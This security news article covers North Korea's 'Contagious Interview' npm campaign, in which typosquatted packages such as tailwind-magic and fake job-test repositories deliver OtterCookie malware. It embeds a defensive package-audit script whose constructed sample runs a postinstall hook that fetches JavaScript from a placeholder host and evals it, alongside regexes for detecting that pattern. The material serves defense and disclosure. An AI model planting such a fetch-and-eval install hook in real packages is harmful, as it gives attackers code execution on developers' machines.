A relentless state-sponsored campaign by North Korean threat actors is aggressively targeting blockchain and Web3 developers by hiding malware inside seemingly legitimate coding tests. A new report from the Socket Threat Research Team reveals that the “Contagious Interview” operation has escalated significantly, flooding the npm ecosystem with nearly 200 malicious packages in a sustained effort to steal cryptocurrency and sensitive credentials.
Despite previous exposures, the campaign shows no signs of slowing down. Researchers tracked a massive surge in activity, noting that “since we last reported on this campaign, it has added at least 197 more malicious npm packages and over 31,000 additional downloads.”
The attackers are specifically hunting developers in the crypto space, using fake job interviews and “test assignments” to trick victims into installing compromised software. “This sustained tempo makes Contagious Interview one of the most prolific campaigns exploiting npm, and it shows how thoroughly North Korean threat actors have adapted their tooling to modern JavaScript and crypto-centric development workflows,” the report warns.
The investigation uncovered a sophisticated, multi-layered infrastructure designed to deliver malware while remaining hidden. Researchers gained a “rare inside view” of the operation by tracing a malicious package named tailwind-magic back to a GitHub account, stardev0914, which hosted 18 different repositories acting as malware carriers.
The attack chain relies on a “coherent adversarial delivery stack” that separates its components to evade detection:
- The Lure: Malicious code lives on legitimate-looking GitHub repositories.
- The Staging: The payload is fetched from a Vercel-hosted endpoint (tetrismic[.]vercel[.]app).
- The Command Center: A separate Command and Control (C2) server handles data theft and tasking.
One of the primary weapons in this wave is tailwind-magic, a package that masquerades as a popular legitimate library. “tailwind-magic is a typosquatted and backdoored clone of the legitimate tailwind-merge library,” the report explains. While it appears to function normally, a hidden script “contacts the threat actor-controlled endpoint… and evals the returned JavaScript,” granting the attackers “arbitrary code execution with full Node.js process privileges.”
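As an added illustration (not code from the Socket report or the project it describes), the following script audits a package before installation for the three traits the article attributes to tailwind-magic: a lifecycle install hook, install-time code that fetches remote JavaScript and evals it, and a name a few edits away from a popular package. The package.json and setup.js contents are constructed samples with a placeholder staging URL, and the popular-package list is an assumed allow-list.

```javascript
// Added example, not code from the Socket report: a pre-install audit of an
// npm package that flags the three traits the article attributes to
// tailwind-magic. The package.json and setup.js below are constructed samples
// with a placeholder staging URL, not the real malware.
const POPULAR = ['tailwind-merge', 'tailwindcss', 'lodash', 'axios', 'express'];
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Levenshtein distance: how many single-character edits separate two names.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                         d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return d[a.length][b.length];
}

// Returns a list of finding strings; an empty list means nothing suspicious.
function auditPackage(pkg, files) {
  const findings = [];
  // 1. Lifecycle hooks run automatically during `npm install`, so a backdoor
  //    placed here needs no action from the developer beyond installing.
  for (const hook of LIFECYCLE)
    if (pkg.scripts && pkg.scripts[hook])
      findings.push(`lifecycle:${hook}=${pkg.scripts[hook]}`);
  // 2. A network fetch and a dynamic-code sink in the same file is the
  //    "fetch remote JavaScript and eval it" pattern the report describes.
  const net = /\b(https?\.(get|request)|fetch|axios(\.\w+)?)\s*\(/;
  const sink = /\b(eval|new Function|vm\.runIn\w+Context)\s*\(/;
  for (const [path, src] of Object.entries(files))
    if (net.test(src) && sink.test(src)) findings.push(`remote-eval:${path}`);
  // 3. A name within a few edits of a popular package is a typosquat candidate
  //    (tailwind-magic is four substitutions away from tailwind-merge).
  for (const p of POPULAR) {
    const dist = editDistance(pkg.name, p);
    if (pkg.name !== p && 1 - dist / Math.max(pkg.name.length, p.length) >= 0.7)
      findings.push(`typosquat:${pkg.name}~${p}:${dist}`);
  }
  return findings;
}

// Constructed sample: a typosquat with a postinstall hook that fetches and evals.
const SAMPLE_PKG = { name: 'tailwind-magic', version: '1.0.0',
                     scripts: { postinstall: 'node setup.js' } };
const SAMPLE_FILES = {
  'setup.js': "const https = require('https');\n" +
    "https.get('https://staging.example/p', r => { let b = ''; " + // placeholder URL
    "r.on('data', c => b += c); r.on('end', () => eval(b)); });",
};

console.log(auditPackage(SAMPLE_PKG, SAMPLE_FILES));
```

Run it against an unpacked tarball (`npm pack` then extract) before adding a dependency; any `remote-eval` or `lifecycle` finding deserves a manual read of the script it names.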
The payload delivered by this infrastructure is a new variant of the “OtterCookie” malware. Analysts note that this latest version “blurs earlier distinctions between OtterCookie and BeaverTail,” two previously distinct malware families used by North Korean groups.
Once active on a victim’s machine, the malware is ruthless. It performs “VM and sandbox detection” to ensure it isn’t being analyzed by security researchers before establishing a long-term connection to its masters. Its capabilities are tuned for maximum financial damage:
- Total Surveillance: It provides a “remote shell, continuous clipboard theft, global keylogging, [and] multi-monitor screenshot capture.”
- Asset Theft: It launches a “recursive filesystem scanning designed to harvest credentials, seed phrases, wallet data, and sensitive documents.”
- Browser Targeting: It specifically targets profile data and crypto-wallet extensions from Chrome and Brave browsers across Windows, macOS, and Linux.
The threat actors went to great lengths to make their fake job offers appear legitimate. The stardev0914 account hosted polished but fake crypto projects to serve as lures.
One notable example was dexproject, a repository that “presents as a standard DEX front-end template.” While the application code looked normal, it was wired to pull in a malicious dependency called node-tailwind. The project was branded as a “Knightsbridge DEX,” complete with “clear copy-paste artifacts” to mimic a real platform, effectively “masquerading as ‘Knightsbridge DEX / KXCO’” to deceive job applicants.
The “Contagious Interview” campaign represents a critical threat to the Web3 development community. By weaponizing the hiring process and infiltrating the open-source supply chain, North Korean actors are successfully bypassing traditional security perimeters. As the report concludes, “the Contagious Interview campaign’s techniques persist and continue to evolve,” with new infiltrations appearing weekly.